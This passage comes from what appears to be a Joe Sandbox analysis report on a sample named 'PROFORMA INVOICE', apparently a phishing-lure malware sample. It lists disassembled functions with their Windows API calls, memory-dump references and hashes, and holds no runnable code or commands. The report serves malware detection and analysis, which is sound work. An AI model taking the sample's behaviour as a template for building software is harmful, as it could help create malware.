DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FA67A6
CloseHandle.KERNEL32(00000000), ref: 00FA67AF

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: ae4208417167fc96683a86c30d96b1946baedf025cad2e5cbc7947d3e8737e3f
Instruction ID: 372fe55d019965d3af427c19d30282a71e11f0de08f77b0b8181b923103f727d
Opcode Fuzzy Hash: ae4208417167fc96683a86c30d96b1946baedf025cad2e5cbc7947d3e8737e3f
Instruction Fuzzy Hash: 61110AB2D012287AE72057A5AC4DFEBBABCEF45764F10419AF504E71C0D6744E809B64

Function 00F9B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F9AA79
Part of subcall function 00F9AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F9AA83
Part of subcall function 00F9AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F9AA92
Part of subcall function 00F9AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F9AA99
Part of subcall function 00F9AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F9AAAF

GetLengthSid.ADVAPI32(?,00000000,00F9ADE4,?,?), ref: 00F9B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F9B227
HeapAlloc.KERNEL32(00000000), ref: 00F9B22E
CopySid.ADVAPI32(?,00000000,?), ref: 00F9B247

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 270695e1193bbeb3ca0f936022b5b712f72a2bc37207f50be0a8108e6e604fac
Instruction ID: 3b0d8757181da4f2c0233af13431de26fd38b1bd19b45264d0dbb179aa53da2d
Opcode Fuzzy Hash: 270695e1193bbeb3ca0f936022b5b712f72a2bc37207f50be0a8108e6e604fac
Instruction Fuzzy Hash: 0E110671A00209FFEF159F94ED84AAEB7B9EF84314F14802DE942DB210D776AE44EB10

Function 00F9B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00F9B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F9B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F9B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F9B4DB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e7801e9e623f55e9e728f796cc836445ca24deb71797d8857147da12f1479f09
Instruction ID: 610a096a8a0520db6de57c37002521cac644b6540efdfcde5691ddd8972914f5
Opcode Fuzzy Hash: e7801e9e623f55e9e728f796cc836445ca24deb71797d8857147da12f1479f09
Instruction Fuzzy Hash: 8111487A900218FFEF11DFA9C985E9DBBB4FB08710F204091E604B7290D771AE10EB94

Function 00F7B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F7B5A5
GetClientRect.USER32(?,?), ref: 00FDE69A
GetCursorPos.USER32(?), ref: 00FDE6A4
ScreenToClient.USER32(?,?), ref: 00FDE6AF

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 3397198ad0c43c5246a5115735637dd40a532f33d8126115db7287518f9fe91c
Instruction ID: d8f923ee57cc9e5bd564f4064e5d066b92187acc165188abdd0ca8f6088d733c
Opcode Fuzzy Hash: 3397198ad0c43c5246a5115735637dd40a532f33d8126115db7287518f9fe91c
Instruction Fuzzy Hash: 9011483290012ABFCB10EF94CC85AFE7BB9EF09304F144456F945EB140D334AA81EBA2

Function 00FA732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FA7352
MessageBoxW.USER32(?,?,?,?), ref: 00FA7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FA739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FA73A2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 04bd21aa973c787e061196015524238dde1166600b7f7455bb9868ffbc145082
Instruction ID: 767009e27329a975bc02f1b95352cb725d44c0ad928e49b13240b742a1fc24f0
Opcode Fuzzy Hash: 04bd21aa973c787e061196015524238dde1166600b7f7455bb9868ffbc145082
Instruction Fuzzy Hash: A81108B2A04348AFCB11AF68DC45E9E7BBDAB4A320F144315F921D7291D6758D04A7A1

Function 00F7D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F7D1BA
GetStockObject.GDI32(00000011), ref: 00F7D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F7D1D8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 0d53f9d0439b35629395638d45748522bf2346c4a2f2f4aa0cbad5927bad750d
Instruction ID: 3e5c06aace8a271fdb07fac196321179b8d7c3229454dc8ee12ccbbdf0635ea8
Opcode Fuzzy Hash: 0d53f9d0439b35629395638d45748522bf2346c4a2f2f4aa0cbad5927bad750d
Instruction Fuzzy Hash: 1511AD7250154DBFFF124F909C94EEABB7AFF08369F848112FA0896150C7729C60BBA1

Function 00F94DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00F94E16

Part of subcall function 00F954F5: __fltout2.LIBCMT ref: 00F9551E

__cftog_l.LIBCMT ref: 00F94E3C
__cftoe_l.LIBCMT ref: 00F94E6E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 6594a4904298553a2850eafd2792b3a4bbbcb6ba9cfee0d6bf7153968a19cdd8
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: CA01393240014ABBDF126F84DC11CEE3F22BB28764B598455FA2859021D336EAB2BB85

Function 00F87452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F87A0D: __getptd_noexit.LIBCMT ref: 00F87A0E

__lock.LIBCMT ref: 00F8748F
InterlockedDecrement.KERNEL32(?), ref: 00F874AC
_free.LIBCMT ref: 00F874BF
InterlockedIncrement.KERNEL32(015970F0), ref: 00F874D7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 35528724909b51034ca90b00d707dba1556f9e474d40b9fda0f457feedbddf2e
Instruction ID: a15d27eba2d16389c143d3d93b84b0be4ac4dd1c2ebd3472ee959004ec97e4b0
Opcode Fuzzy Hash: 35528724909b51034ca90b00d707dba1556f9e474d40b9fda0f457feedbddf2e
Instruction Fuzzy Hash: 62015B32E0A725DBCB22FF6498097DEBB60BB44724F244109F854A7684CB7DA941EBD1

Function 00F87A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00F87AD8

Part of subcall function 00F87CF4: __mtinitlocknum.LIBCMT ref: 00F87D06
Part of subcall function 00F87CF4: EnterCriticalSection.KERNEL32(00000000,?,00F87ADD,0000000D), ref: 00F87D1F

InterlockedIncrement.KERNEL32(?), ref: 00F87AE5
__lock.LIBCMT ref: 00F87AF9
___addlocaleref.LIBCMT ref: 00F87B17

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: e1f1fe1ed8abfa00847efca1e069da0cc29ad9502ca5a192594bb5e50ece2b7b
Instruction ID: cc16d25ace6794786d166cf48592a428e165aaf5383dd9c73d11437d97685a67
Opcode Fuzzy Hash: e1f1fe1ed8abfa00847efca1e069da0cc29ad9502ca5a192594bb5e50ece2b7b
Instruction Fuzzy Hash: B1016D71505B40DFD721FF75D90678AB7F0AF40325F20890EA49A976A1CBB8A680DB11

Function 00FCE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FCE33D
_memset.LIBCMT ref: 00FCE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01023D00,01023D44), ref: 00FCE37B
CloseHandle.KERNEL32 ref: 00FCE38D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: d884cb6ece04fc28c6e9977d2d25cb2f27822ec6b1215690a515e6cce2e961d6
Instruction ID: f44d194a1fe43b087dd9f6d0a7af0de2ce56d6b4385cd0590ddacc0c8e874fc7
Opcode Fuzzy Hash: d884cb6ece04fc28c6e9977d2d25cb2f27822ec6b1215690a515e6cce2e961d6
Instruction Fuzzy Hash: 3FF03AB1640354BAE2203A60BC46FB77E5CEB08754F504421FF48EE192D67EAC0097A8

Function 00FCEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00F7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F7AFE3
Part of subcall function 00F7AF83: SelectObject.GDI32(?,00000000), ref: 00F7AFF2
Part of subcall function 00F7AF83: BeginPath.GDI32(?), ref: 00F7B009
Part of subcall function 00F7AF83: SelectObject.GDI32(?,00000000), ref: 00F7B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00FCEA8E
LineTo.GDI32(00000000,?,?), ref: 00FCEA9B
EndPath.GDI32(00000000), ref: 00FCEAAB
StrokePath.GDI32(00000000), ref: 00FCEAB9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: a06d61011cbb3cc652cba230ef03b310e36569f8ba2fa87e56305e9f12e06fb1
Instruction ID: 59f3942f71aba10c6c03e93f3dd295c45ff7f964aae162c7a249012df41b5961
Opcode Fuzzy Hash: a06d61011cbb3cc652cba230ef03b310e36569f8ba2fa87e56305e9f12e06fb1
Instruction Fuzzy Hash: 88F08231045299BBDB229F94AD0EFCE3F19AF0A321F184101FF11694E1877D5561EB95

Function 00F9C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F9C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F9C85D
GetCurrentThreadId.KERNEL32 ref: 00F9C864
AttachThreadInput.USER32(00000000), ref: 00F9C86B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ae4b56325801fcc023966c435ab8e96ec68517fc2f191b005d0cee393541aa26
Instruction ID: f2682828eef97bc95e8e2641bbf42f0af142c46f5b250a5fa2ebdc38e9178f3f
Opcode Fuzzy Hash: ae4b56325801fcc023966c435ab8e96ec68517fc2f191b005d0cee393541aa26
Instruction Fuzzy Hash: F6E030715412A87AEB101B62DC4DEDB7F1CEF067A1F008011B50988850C6728581E7E0

Function 00F9B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00F9B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,00F9AC9D), ref: 00F9B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F9AC9D), ref: 00F9B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,00F9AC9D), ref: 00F9B0F1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: f0b85d815459b983d41f1a8f3e1afcad0a5f87b9902406f2b4fd955cde244f6c
Instruction ID: 692a0d032c357e427f4f11745d2158d869e13bc4cddcf3e86f3d86b38598b1f9
Opcode Fuzzy Hash: f0b85d815459b983d41f1a8f3e1afcad0a5f87b9902406f2b4fd955cde244f6c
Instruction Fuzzy Hash: 77E08632A012159FEB201FB26D4CB473BA8EF557A2F018828F341DE050DB388401E760

Function 00F7B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F7B496
SetTextColor.GDI32(?,000000FF), ref: 00F7B4A0
SetBkMode.GDI32(?,00000001), ref: 00F7B4B5
GetStockObject.GDI32(00000005), ref: 00F7B4BD
GetWindowDC.USER32(?,00000000), ref: 00FDDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00FDDE38
GetPixel.GDI32(00000000,?,00000000), ref: 00FDDE51
GetPixel.GDI32(00000000,00000000,?), ref: 00FDDE6A
GetPixel.GDI32(00000000,?,?), ref: 00FDDE8A
ReleaseDC.USER32(?,00000000), ref: 00FDDE95

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: cb4a44759aa2a67fc30d841525c1f2f373d4ef015a980948b5d8d4cd5aadfc18
Instruction ID: 8db9ea16bd74df0553205fc0b4101062d6f73b0ddb499c4a3ec1bb47ae79b04c
Opcode Fuzzy Hash: cb4a44759aa2a67fc30d841525c1f2f373d4ef015a980948b5d8d4cd5aadfc18
Instruction Fuzzy Hash: A8E0ED31500284AAEF215F64AC49BD83B12AB52335F14C667F6A95C0E1C7B64981EB11

Function 00F9B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F9B2DF
UnloadUserProfile.USERENV(?,?), ref: 00F9B2EB
CloseHandle.KERNEL32(?), ref: 00F9B2F4
CloseHandle.KERNEL32(?), ref: 00F9B2FC

Part of subcall function 00F9AB24: GetProcessHeap.KERNEL32(00000000,?,00F9A848), ref: 00F9AB2B
Part of subcall function 00F9AB24: HeapFree.KERNEL32(00000000), ref: 00F9AB32

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: b24b5c14d794b32671e7a249b6e31a569af162238e728be726be92e52eeb443b
Instruction ID: ff8d4a6b0693d9463c5732a906b2233284bfc261d5a7ae5cabc9511d3014c509
Opcode Fuzzy Hash: b24b5c14d794b32671e7a249b6e31a569af162238e728be726be92e52eeb443b
Instruction Fuzzy Hash: 69E0B63A104049BFDB012FA5EC48859FBA6FF983213108221F62585975CB33A871FB91

Function 00FDB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00FDB29A
GetDC.USER32(00000000), ref: 00FDB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FDB2C3
ReleaseDC.USER32 ref: 00FDB2E2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: dca8e185e103646ed82e3542b5dc2ec2cde230ef5d2bb0e5c79db0f49043a3c2
Instruction ID: 4ccf8d571385a1d5671777202164914fa4da1f905e92b7876b18a4108e781e86
Opcode Fuzzy Hash: dca8e185e103646ed82e3542b5dc2ec2cde230ef5d2bb0e5c79db0f49043a3c2
Instruction Fuzzy Hash: ACE01AB2100248EFDB015F70888862D7BB9EB4C351F15C80AF95E8B610CB759840AB40

Function 00FDB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00FDB2AE
GetDC.USER32(00000000), ref: 00FDB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FDB2C3
ReleaseDC.USER32 ref: 00FDB2E2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 72d8338e13e593a2c1e5df5034e72e6709c52d8c7827314ab9a9eb603e173978
Instruction ID: 993d1db27b1dd93c68d1ed69b7b8603d64626c55913b6c910d5ee7cac504ad31
Opcode Fuzzy Hash: 72d8338e13e593a2c1e5df5034e72e6709c52d8c7827314ab9a9eb603e173978
Instruction Fuzzy Hash: A0E046B1500248EFDB015F70CC8862D7BA9EB8C360F11C80AFA5E8B610CB7A9800AB00

Function 00F9DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

